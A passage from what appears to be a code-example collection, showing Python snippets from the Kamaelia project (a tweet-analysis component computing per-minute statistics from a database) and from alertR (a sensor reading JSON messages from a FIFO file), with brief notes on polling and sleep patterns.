                    cursor.execute("""UPDATE programmes SET meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s, analysed = 1 WHERE pid = %s AND timestamp = %s""",(meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))
                    print "Analysis component: Done!"

            # Sleep here until more data is available to analyse
            print "Analysis component: Sleeping for 10 seconds..."
            time.sleep(10)
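
The waits on self.dataReady above are busy-wait loops with a 10 ms sleep per iteration, so the thread yields the CPU between polls of the NLTK component. A minimal, self-contained sketch of the same pattern follows; wait_for, data_ready and fetch_result are illustrative names rather than part of the project, and the 30 second timeout corresponds roughly to the commented-out failcounter (3000 polls of 0.01 s).

import time

def wait_for(data_ready, fetch_result, poll_interval=0.01, timeout=30.0):
    # Poll data_ready() with short sleeps until data arrives or the timeout expires.
    waited = 0.0
    while not data_ready():
        if waited >= timeout:
            return None              # give up rather than block forever
        time.sleep(poll_interval)    # yield the CPU between polls
        waited += poll_interval
    return fetch_result()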

Example 15

Project: kamaelia_
Source File: LiveAnalysis.py
View license
    def main(self):
        # Calculate running total and mean etc

        cursor = self.dbConnect(self.dbuser,self.dbpass)
        while not self.finished():
            # The below does LIVE and FINAL analysis - do NOT run DataAnalyser at the same time

            print "Analysis component: Checking for new data..."

            # Stage 1: Live analysis - could do with a better way to do the first query (indexed field 'analysed' to speed up for now)
            # Could move this into the main app to take a copy of tweets on arrival, but would rather solve this separately if possible
            cursor.execute("""SELECT tid,pid,timestamp,text,tweet_id,programme_position FROM rawdata WHERE analysed = 0 ORDER BY tid LIMIT 5000""")
            data = cursor.fetchall()

            # Cycle through all the as yet unanalysed tweets
            for result in data:
                tid = result[0]
                pid = result[1]
                tweettime = result[2] # Timestamp based on the tweet's created_at field
                tweettext = result[3]
                tweetid = result[4] # This is the real tweet ID, tid just makes a unique identifier as each tweet can be stored against several pids
                progpos = result[5] # Position through the programme that the tweet was made
                dbtime = datetime.utcfromtimestamp(tweettime)
                # Each tweet will be grouped into chunks of one minute to make display better, so set the seconds to zero
                # This particular time is only used for console display now as a more accurate one calculated from programme position is found later
                dbtime = dbtime.replace(second=0)
                print "Analysis component: Analysing new tweet for pid", pid, "(" + str(dbtime) + "):"
                print "Analysis component: '" + tweettext + "'"
                cursor.execute("""SELECT duration FROM programmes_unique WHERE pid = %s""",(pid))
                progdata = cursor.fetchone()
                duration = progdata[0]
                cursor.execute("""SELECT totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timediff,timestamp,utcoffset FROM programmes WHERE pid = %s ORDER BY timestamp DESC""",(pid))
                progdata2 = cursor.fetchone()
                totaltweets = progdata2[0]
                # Increment the total tweets recorded for this programme's broadcast
                totaltweets += 1
                meantweets = progdata2[1]
                mediantweets = progdata2[2]
                modetweets = progdata2[3]
                stdevtweets = progdata2[4]
                timediff = progdata2[5]
                timestamp = progdata2[6]
                utcoffset = progdata2[7]

                # Need to work out the timestamp to assign to the entry in analysed data
                progstart = timestamp - timediff
                progmins = int(progpos / 60)
                analysedstamp = int(progstart + (progmins * 60))
                # Ensure that this tweet occurs within the length of the programme, otherwise for the purposes of this program it's useless
                if progpos > 0 and progpos <= duration:
                    cursor.execute("""SELECT did,totaltweets,wordfreqexpected,wordfrequnexpected FROM analyseddata WHERE pid = %s AND timestamp = %s""",(pid,analysedstamp))
                    analyseddata = cursor.fetchone()
                    # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                    #failcounter = 0
                    # Pass this tweet to the NLTK analysis component
                    self.send([pid,tweetid],"nltk")
                    while not self.dataReady("nltk"):
                    #    if failcounter >= 3000:
                    #        nltkdata = list()
                    #        break
                        time.sleep(0.01)
                    #    failcounter += 1
                    #if failcounter < 3000:
                    if 1:
                        # Receive back a list of words and their frequency for this tweet, including whether or not they are common, an entity etc
                        nltkdata = self.recv("nltk")
                    if analyseddata == None: # No tweets yet recorded for this minute
                        minutetweets = 1
                        cursor.execute("""INSERT INTO analyseddata (pid,totaltweets,timestamp) VALUES (%s,%s,%s)""", (pid,minutetweets,analysedstamp))
                        for word in nltkdata:
                            # Check if we're storing a word or phrase here
                            if nltkdata[word][0] == 1:
                                cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                            else:
                                cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                    else:
                        did = analyseddata[0]
                        minutetweets = analyseddata[1] # Get current number of tweets for this minute
                        minutetweets += 1 # Add one to it for this tweet

                        cursor.execute("""UPDATE analyseddata SET totaltweets = %s WHERE did = %s""",(minutetweets,did))

                        for word in nltkdata:
                            # Check if we're storing a word or phrase
                            if nltkdata[word][0] == 1:
                                cursor.execute("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND phrase LIKE %s""",(pid,analysedstamp,word))
                                # Check if this phrase has already been stored for this minute - if so, increment the count
                                wordcheck = cursor.fetchone()
                                if wordcheck == None:
                                    cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    cursor.execute("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                            else:
                                cursor.execute("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND word LIKE %s""",(pid,analysedstamp,word))
                                # Check if this word has already been stored for this minute - if so, increment the count
                                wordcheck = cursor.fetchone()
                                if wordcheck == None:
                                    cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    cursor.execute("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                    # Averages / stdev are calculated roughly based on the programme's running time at this point
                    progdate = datetime.utcfromtimestamp(timestamp) + timedelta(seconds=utcoffset)
                    actualstart = progdate - timedelta(seconds=timediff)
                    actualtweettime = datetime.utcfromtimestamp(tweettime + utcoffset)

                    # Calculate how far through the programme this tweet occurred
                    runningtime = actualtweettime - actualstart
                    runningtime = runningtime.seconds

                    if runningtime < 0:
                        runningtime = 0
                    else:
                        runningtime = float(runningtime) / 60

                    try:
                        meantweets = totaltweets / runningtime
                    except ZeroDivisionError, e:
                        meantweets = 0

                    cursor.execute("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,progstart,analysedstamp+duration))
                    analyseddata = cursor.fetchall()

                    runningtime = int(runningtime)

                    tweetlist = list()
                    for result in analyseddata:
                        totaltweetsmin = result[0]
                        # Create a list of each minute and the total tweets for that minute in the programme
                        tweetlist.append(int(totaltweetsmin))

                    # Ensure tweetlist has enough entries
                    # If a minute has no tweets, it won't have a database record, so this has to be added
                    if len(tweetlist) < runningtime:
                        additions = runningtime - len(tweetlist)
                        while additions > 0:
                            tweetlist.append(0)
                            additions -= 1

                    # Order by programme position 0,1,2, mins etc
                    tweetlist.sort()

                    mediantweets = tweetlist[int(len(tweetlist)/2)]

                    modes = dict()
                    stdevlist = list()
                    for tweet in tweetlist:
                        modes[tweet] = tweetlist.count(tweet)
                        stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                    modeitems = [[v, k] for k, v in modes.items()]
                    modeitems.sort(reverse=True)
                    modetweets = int(modeitems[0][1])

                    stdevtweets = 0
                    for val in stdevlist:
                        stdevtweets += val

                    try:
                        stdevtweets = math.sqrt(stdevtweets / runningtime)
                    except ZeroDivisionError, e:
                        stdevtweets = 0

                    # Finished analysis - update DB
                    cursor.execute("""UPDATE programmes SET totaltweets = %s, meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s WHERE pid = %s AND timestamp = %s""",(totaltweets,meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))

                else:
                    print "Analysis component: Skipping tweet - falls outside the programme's running time"

                # Mark the tweet as analysed
                cursor.execute("""UPDATE rawdata SET analysed = 1 WHERE tid = %s""",(tid))
                print "Analysis component: Done!"

            # Stage 2: If all raw tweets analysed and imported = 1 (all data for this programme stored and programme finished), finalise the analysis - could do bookmark identification here too?
            cursor.execute("""SELECT pid,totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timestamp,timediff FROM programmes WHERE imported = 1 AND analysed = 0 LIMIT 5000""")
            data = cursor.fetchall()
            # Cycle through each programme that's ready for final analysis
            for result in data:
                pid = result[0]
                cursor.execute("""SELECT duration,title FROM programmes_unique WHERE pid = %s""",(pid))
                data2 = cursor.fetchone()
                duration = data2[0]
                totaltweets = result[1]
                meantweets = result[2]
                mediantweets = result[3]
                modetweets = result[4]
                stdevtweets = result[5]
                title = data2[1]
                timestamp = result[6]
                timediff = result[7]
                # Cycle through checking if all tweets for this programme have been analysed - if so finalise the stats
                cursor.execute("""SELECT tid FROM rawdata WHERE analysed = 0 AND pid = %s""", (pid))
                if cursor.fetchone() == None:
                    # OK to finalise stats here
                    print "Analysis component: Finalising stats for pid:", pid, "(" + title + ")"

                    meantweets = float(totaltweets) / (duration / 60) # Mean tweets per minute

                    cursor.execute("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,timestamp-timediff,timestamp+duration-timediff))
                    analyseddata = cursor.fetchall()

                    runningtime = duration / 60

                    tweetlist = list()
                    for result in analyseddata:
                        totaltweetsmin = result[0]
                        tweetlist.append(int(totaltweetsmin))

                    # Ensure tweetlist has enough entries - as above, if no tweets are recorded for a minute it won't be present in the DB
                    if len(tweetlist) < runningtime:
                        additions = runningtime - len(tweetlist)
                        while additions > 0:
                            tweetlist.append(0)
                            additions -= 1

                    tweetlist.sort()

                    mediantweets = tweetlist[int(len(tweetlist)/2)]

                    modes = dict()
                    stdevlist = list()
                    for tweet in tweetlist:
                        modes[tweet] = tweetlist.count(tweet)
                        stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                    modeitems = [[v, k] for k, v in modes.items()]
                    modeitems.sort(reverse=True)
                    modetweets = int(modeitems[0][1])

                    stdevtweets = 0
                    for val in stdevlist:
                        stdevtweets += val
                    try:
                        stdevtweets = math.sqrt(stdevtweets / runningtime)
                    except ZeroDivisionError, e:
                        stdevtweets = 0

                    if 1: # At the moment this data is purely a terminal readout, covering word and phrase frequency and retweets
                        sqltimestamp1 = timestamp - timediff
                        sqltimestamp2 = timestamp + duration - timediff
                        cursor.execute("""SELECT tweet_id FROM rawdata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""", (pid,sqltimestamp1,sqltimestamp2))
                        rawtweetids = cursor.fetchall()
                        tweetids = list()
                        for tweet in rawtweetids:
                            tweetids.append(tweet[0])

                        if len(tweetids) > 0:
                            # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                            #failcounter = 0
                            self.send([pid,tweetids],"nltkfinal")
                            while not self.dataReady("nltkfinal"):
                            #    if failcounter >= 3000:
                            #        nltkdata = list()
                            #        break
                                time.sleep(0.01)
                            #    failcounter += 1
                            #if failcounter < 3000:
                            if 1:
                                nltkdata = self.recv("nltkfinal")

                    cursor.execute("""UPDATE programmes SET meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s, analysed = 1 WHERE pid = %s AND timestamp = %s""",(meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))
                    print "Analysis component: Done!"

            # Sleep here until more data is available to analyse
            print "Analysis component: Sleeping for 10 seconds..."
            time.sleep(10)
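
Apart from the per-tweet polling, the component also sleeps for a fixed ten seconds at the end of each pass before querying the database for new work. Stripped of the analysis itself, that outer loop reduces to something like the sketch below, where fetch_batch, process and idle_delay are placeholder names used purely for illustration.

import time

def poll_for_work(fetch_batch, process, idle_delay=10):
    # Repeatedly drain the pending work, sleeping between passes so the
    # database is not hammered when nothing new has arrived.
    while True:
        for item in fetch_batch():
            process(item)
        time.sleep(idle_delay)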

Example 16

Project: kamaelia_
Source File: LiveAnalysis.py
View license
    def main(self):
        # Calculate running total and mean etc
            self.dbConnect()
            while not self.finished():
                # The below does LIVE and FINAL analysis - do NOT run DataAnalyser at the same time

                Print("Analysis component: Checking for new data...")

                # Stage 1: Live analysis - could do with a better way to do the first query (indexed field 'analysed' to speed up for now)
                # Could move this into the main app to take a copy of tweets on arrival, but would rather solve this separately if possible
                self.db_select("""SELECT tid,pid,timestamp,text,tweet_id,programme_position FROM rawdata WHERE analysed = 0 ORDER BY tid LIMIT 5000""")
                data = self.db_fetchall()

                # Cycle through all the as yet unanalysed tweets
                for result in data:
                    tid = result[0]
                    pid = result[1]
                    tweettime = result[2] # Timestamp based on the tweet's created_at field
                    tweettext = result[3]
                    tweetid = result[4] # This is the real tweet ID, tid just makes a unique identifier as each tweet can be stored against several pids
                    progpos = result[5] # Position through the programme that the tweet was made
                    dbtime = datetime.utcfromtimestamp(tweettime)
                    # Each tweet will be grouped into chunks of one minute to make display better, so set the seconds to zero
                    # This particular time is only used for console display now as a more accurate one calculated from programme position is found later
                    dbtime = dbtime.replace(second=0)
                    Print("Analysis component: Analysing new tweet for pid", pid, "(" , dbtime ,"):")
                    try:
                        Print("Analysis component: '" , tweettext , "'")
                    except UnicodeEncodeError, e:
                        Print ("UnicodeEncodeError", e)
                    self.db_select("""SELECT duration FROM programmes_unique WHERE pid = %s""",(pid))
                    progdata = self.db_fetchone()
                    duration = progdata[0]
                    self.db_select("""SELECT totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timediff,timestamp,utcoffset FROM programmes WHERE pid = %s ORDER BY timestamp DESC""",(pid))
                    progdata2 = self.db_fetchone()
                    totaltweets = progdata2[0]
                    # Increment the total tweets recorded for this programme's broadcast
                    totaltweets += 1
                    meantweets = progdata2[1]
                    mediantweets = progdata2[2]
                    modetweets = progdata2[3]
                    stdevtweets = progdata2[4]
                    timediff = progdata2[5]
                    timestamp = progdata2[6]
                    utcoffset = progdata2[7]

                    # Need to work out the timestamp to assign to the entry in analysed data
                    progstart = timestamp - timediff
                    progmins = int(progpos / 60)
                    analysedstamp = int(progstart + (progmins * 60))
                    # Ensure that this tweet occurs within the length of the programme, otherwise for the purposes of this program it's useless

                    if progpos > 0 and progpos <= duration:
                        self.db_select("""SELECT did,totaltweets,wordfreqexpected,wordfrequnexpected FROM analyseddata WHERE pid = %s AND timestamp = %s""",(pid,analysedstamp))
                        analyseddata = self.db_fetchone()
                        # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                        #failcounter = 0
                        # Pass this tweet to the NLTK analysis component
                        self.send([pid,tweetid],"nltk")
#                        print "BUM", 1
                        while not self.dataReady("nltk"):
                        #    if failcounter >= 3000:
                        #        nltkdata = list()
                        #        break
                            time.sleep(0.01)
                        #    failcounter += 1
                        #if failcounter < 3000:
#                        print "BUM", 2
                        if 1:
                            # Receive back a list of words and their frequency for this tweet, including whether or not they are common, an entity etc
                            nltkdata = self.recv("nltk")
                        if analyseddata == None: # No tweets yet recorded for this minute
                            minutetweets = 1
                            self.db_insert("""INSERT INTO analyseddata (pid,totaltweets,timestamp) VALUES (%s,%s,%s)""", (pid,minutetweets,analysedstamp))
                            for word in nltkdata:
                                # Check if we're storing a word or phrase here
                                if nltkdata[word][0] == 1:
                                    self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                        else:
                            did = analyseddata[0]
                            minutetweets = analyseddata[1] # Get current number of tweets for this minute
                            minutetweets += 1 # Add one to it for this tweet

                            self.db_update("""UPDATE analyseddata SET totaltweets = %s WHERE did = %s""",(minutetweets,did))

                            for word in nltkdata:
                                # Check if we're storing a word or phrase
                                if nltkdata[word][0] == 1:
                                    self.db_select("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND phrase LIKE %s""",(pid,analysedstamp,word))
                                    # Check if this phrase has already been stored for this minute - if so, increment the count
                                    wordcheck = self.db_fetchone()
                                    if wordcheck == None:
                                        self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                    else:
                                        self.db_update("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                                else:
                                    self.db_select("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND word LIKE %s""",(pid,analysedstamp,word))
                                    # Check if this word has already been stored for this minute - if so, increment the count
                                    wordcheck = self.db_fetchone()
                                    if wordcheck == None:
                                        self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                    else:
                                        self.db_update("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                        # Averages / stdev are calculated roughly based on the programme's running time at this point
                        progdate = datetime.utcfromtimestamp(timestamp) + timedelta(seconds=utcoffset)
                        actualstart = progdate - timedelta(seconds=timediff)
                        actualtweettime = datetime.utcfromtimestamp(tweettime + utcoffset)

                        # Calculate how far through the programme this tweet occurred
                        runningtime = actualtweettime - actualstart
                        runningtime = runningtime.seconds

                        if runningtime < 0:
                            runningtime = 0
                        else:
                            runningtime = float(runningtime) / 60

                        try:
                            meantweets = totaltweets / runningtime
                        except ZeroDivisionError, e:
                            meantweets = 0

                        self.db_select("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,progstart,analysedstamp+duration))
                        analyseddata = self.db_fetchall()

                        runningtime = int(runningtime)

                        tweetlist = list()
                        for result in analyseddata:
                            totaltweetsmin = result[0]
                            # Create a list of each minute and the total tweets for that minute in the programme
                            tweetlist.append(int(totaltweetsmin))

                        # Ensure tweetlist has enough entries
                        # If a minute has no tweets, it won't have a database record, so this has to be added
                        if len(tweetlist) < runningtime:
                            additions = runningtime - len(tweetlist)
                            while additions > 0:
                                tweetlist.append(0)
                                additions -= 1

                        # Order by programme position 0,1,2, mins etc
                        tweetlist.sort()

                        mediantweets = tweetlist[int(len(tweetlist)/2)]

                        modes = dict()
                        stdevlist = list()
                        for tweet in tweetlist:
                            modes[tweet] = tweetlist.count(tweet)
                            stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                        modeitems = [[v, k] for k, v in modes.items()]
                        modeitems.sort(reverse=True)
                        modetweets = int(modeitems[0][1])

                        stdevtweets = 0
                        for val in stdevlist:
                            stdevtweets += val

                        try:
                            stdevtweets = math.sqrt(stdevtweets / runningtime)
                        except ZeroDivisionError, e:
                            stdevtweets = 0

                        # Finished analysis - update DB
                        self.db_update("""UPDATE programmes SET totaltweets = %s, meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s WHERE pid = %s AND timestamp = %s""",(totaltweets,meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))

                    else:
                        pass
                        # Print("Analysis component: Skipping tweet - falls outside the programme's running time")

                    # Mark the tweet as analysed
                    self.db_update("""UPDATE rawdata SET analysed = 1 WHERE tid = %s""",(tid))
                    Print("Analysis component: Done!")

                # Stage 2: If all raw tweets analysed and imported = 1 (all data for this programme stored and programme finished), finalise the analysis - could do bookmark identification here too?
                self.db_select("""SELECT pid,totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timestamp,timediff FROM programmes WHERE imported = 1 AND analysed = 0 LIMIT 5000""")
                data = self.db_fetchall()
                # Cycle through each programme that's ready for final analysis
                for result in data:
                    pid = result[0]
                    self.db_select("""SELECT duration,title FROM programmes_unique WHERE pid = %s""",(pid))
                    data2 = self.db_fetchone()
                    if not data2:
                        Print("Getting data for duration,title, etc failed - pid", pid)
                        Print("Let's try skipping this pid")
                        continue
                    duration = data2[0]
                    totaltweets = result[1]
                    meantweets = result[2]
                    mediantweets = result[3]
                    modetweets = result[4]
                    stdevtweets = result[5]
                    title = data2[1]
                    timestamp = result[6]
                    timediff = result[7]
                    # Cycle through checking if all tweets for this programme have been analysed - if so finalise the stats
                    self.db_select("""SELECT tid FROM rawdata WHERE analysed = 0 AND pid = %s""", (pid))
                    if self.db_fetchone() == None:
                        # OK to finalise stats here
                        Print("Analysis component: Finalising stats for pid:", pid, "(" , title , ")")
                        meantweets = float(totaltweets) / (duration / 60) # Mean tweets per minute
                        self.db_select("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,timestamp-timediff,timestamp+duration-timediff))
                        analyseddata = self.db_fetchall()

                        runningtime = duration / 60

                        tweetlist = list()
                        for result in analyseddata:
                            totaltweetsmin = result[0]
                            tweetlist.append(int(totaltweetsmin))

                        # Ensure tweetlist has enough entries - as above, if no tweets are recorded for a minute it won't be present in the DB
                        if len(tweetlist) < runningtime:
                            additions = runningtime - len(tweetlist)
                            while additions > 0:
                                tweetlist.append(0)
                                additions -= 1

                        tweetlist.sort()

                        mediantweets = tweetlist[int(len(tweetlist)/2)]

                        modes = dict()
                        stdevlist = list()
                        for tweet in tweetlist:
                            modes[tweet] = tweetlist.count(tweet)
                            stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                        modeitems = [[v, k] for k, v in modes.items()]
                        modeitems.sort(reverse=True)
                        modetweets = int(modeitems[0][1])

                        stdevtweets = 0
                        for val in stdevlist:
                            stdevtweets += val
                        try:
                            stdevtweets = math.sqrt(stdevtweets / runningtime)
                        except ZeroDivisionError, e:
                            stdevtweets = 0

                        if 1: # At the moment this data is purely a terminal readout, covering word and phrase frequency and retweets
                            sqltimestamp1 = timestamp - timediff
                            sqltimestamp2 = timestamp + duration - timediff
                            self.db_select("""SELECT tweet_id FROM rawdata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""", (pid,sqltimestamp1,sqltimestamp2))
                            rawtweetids = self.db_fetchall()
                            tweetids = list()
                            for tweet in rawtweetids:
                                tweetids.append(tweet[0])

                            if len(tweetids) > 0:
                                # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 10 secs)
                                failcounter = 0
                                self.send([pid,tweetids],"nltkfinal")
                                while not self.dataReady("nltkfinal"):
                                    if failcounter >= 1000:
                                        Print("Timed out waiting for NTLKFINAL")
                                        nltkdata = list()
                                        break
                                    time.sleep(0.01)

                                    failcounter += 1
                                    if failcounter % 100 == 0:
                                        Print( "Hanging waiting for NLTKFINAL" )

                                Print("failcounter (<1000 is success)", failcounter)
                                if failcounter < 1000:
#                                if 1:
                                    nltkdata = self.recv("nltkfinal")

                        self.db_update("""UPDATE programmes SET meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s, analysed = 1 WHERE pid = %s AND timestamp = %s""",(meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))
                        Print("Analysis component: Done!")

                # Sleep here until more data is available to analyse
                Print("Analysis component: Sleeping for 10 seconds...")
                time.sleep(10)
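
This variant re-enables the fail counter, so the wait on the nltkfinal channel is bounded: after 1000 polls of 0.01 seconds (about ten seconds) it logs a timeout and falls back to an empty result, and every hundredth poll it prints a progress message. A compact sketch of that bounded wait is given below; bounded_wait, data_ready and max_polls are illustrative names, not part of the Kamaelia API.

import time

def bounded_wait(data_ready, poll_interval=0.01, max_polls=1000):
    # Poll until data_ready() returns True or max_polls attempts have been made.
    for attempt in range(1, max_polls + 1):
        if data_ready():
            return True
        time.sleep(poll_interval)
        if attempt % 100 == 0:
            print("still waiting after %d polls" % attempt)
    return False  # timed out; the caller falls back to an empty result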

Example 17

Project: alertR
Source File: sensor.py
View license
	def run(self):

		while True:

			# check if FIFO file exists
			# => remove it if it does
			if os.path.exists(self.fifoFile):
				try:
					os.remove(self.fifoFile)
				except Exception as e:
					logging.exception("[%s]: Could not delete "
						% self.fileName
						+ "FIFO file of sensor with id '%d'."
						% self.id)
					time.sleep(10)
					continue

			# create a new FIFO file
			try:
				os.umask(self.umask)
				os.mkfifo(self.fifoFile)
			except Exception as e:
				logging.exception("[%s]: Could not create "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				time.sleep(10)
				continue

			# read FIFO for data
			data = ""
			try:
				fifo = open(self.fifoFile, "r")
				data = fifo.read()
				fifo.close()
			except Exception as e:
				logging.exception("[%s]: Could not read data from "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				time.sleep(10)
				continue

			logging.debug("[%s]: Received data '%s' from "
				% (self.fileName, data)
				+ "FIFO file of sensor with id '%d'."
				% self.id)

			# parse received data
			try:

				message = json.loads(data)

				# Parse message depending on type.
				# Type: statechange
				if str(message["message"]).upper() == "STATECHANGE":

					# Check if state is valid.
					tempInputState = message["payload"]["state"]
					if not self._checkState(tempInputState):
						logging.error("[%s]: Received state "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data type is valid.
					tempDataType = message["payload"]["dataType"]
					if not self._checkDataType(tempDataType):
						logging.error("[%s]: Received data type "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Set new data.
					if self.sensorDataType == SensorDataType.NONE:
						self.sensorData = None
					elif self.sensorDataType == SensorDataType.INT:
						self.sensorData = int(message["payload"]["data"])
					elif self.sensorDataType == SensorDataType.FLOAT:
						self.sensorData = float(message["payload"]["data"])

					# Set state.
					self.temporaryState = tempInputState

					# Force state change sending if the data could be changed.
					if self.sensorDataType != SensorDataType.NONE:

						# Create state change object that is
						# sent to the server.
						self.forceSendStateLock.acquire()
						self.stateChange = StateChange()
						self.stateChange.clientSensorId = self.id
						if tempInputState == self.triggerState:
							self.stateChange.state = 1
						else:
							self.stateChange.state = 0
						self.stateChange.dataType = tempDataType
						self.stateChange.sensorData = self.sensorData
						self.shouldForceSendState = True
						self.forceSendStateLock.release()

				# Type: sensoralert
				elif str(message["message"]).upper() == "SENSORALERT":

					# Check if state is valid.
					tempInputState = message["payload"]["state"]
					if not self._checkState(tempInputState):
						logging.error("[%s]: Received state "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if hasOptionalData field is valid.
					tempHasOptionalData = message[
						"payload"]["hasOptionalData"]
					if not self._checkHasOptionalData(tempHasOptionalData):
						logging.error("[%s]: Received hasOptionalData field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data type is valid.
					tempDataType = message["payload"]["dataType"]
					if not self._checkDataType(tempDataType):
						logging.error("[%s]: Received data type "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					if self.sensorDataType == SensorDataType.NONE:
						tempSensorData = None
					elif self.sensorDataType == SensorDataType.INT:
						tempSensorData = int(message["payload"]["data"])
					elif self.sensorDataType == SensorDataType.FLOAT:
						tempSensorData = float(message["payload"]["data"])

					# Check if hasLatestData field is valid.
					tempHasLatestData = message[
						"payload"]["hasLatestData"]
					if not self._checkHasLatestData(tempHasLatestData):
						logging.error("[%s]: Received hasLatestData field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if changeState field is valid.
					tempChangeState = message[
						"payload"]["changeState"]
					if not self._checkChangeState(tempChangeState):
						logging.error("[%s]: Received changeState field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data should be transferred with the sensor alert
					# => if so, parse it
					tempOptionalData = None
					if tempHasOptionalData:

						tempOptionalData = message["payload"]["optionalData"]

						# check if data is of type dict
						if not isinstance(tempOptionalData, dict):
							logging.warning("[%s]: Received optional data "
								% self.fileName
								+ "from FIFO file of sensor with id '%d' "
								% self.id
								+ "invalid. Ignoring message.")
							continue

					# Set optional data.
					self.hasOptionalData = tempHasOptionalData
					self.optionalData = tempOptionalData

					# Set new data.
					if tempHasLatestData:
						self.sensorData = tempSensorData

					# Set state.
					if tempChangeState:
						self.temporaryState = tempInputState

					# Create sensor alert object that is sent to the server.
					self.forceSendAlertLock.acquire()
					self.sensorAlert = SensorAlert()
					self.sensorAlert.clientSensorId = self.id
					if tempInputState == self.triggerState:
						self.sensorAlert.state = 1
					else:
						self.sensorAlert.state = 0
					self.sensorAlert.hasOptionalData = tempHasOptionalData
					self.sensorAlert.optionalData = tempOptionalData
					self.sensorAlert.changeState = tempChangeState
					self.sensorAlert.hasLatestData = tempHasLatestData
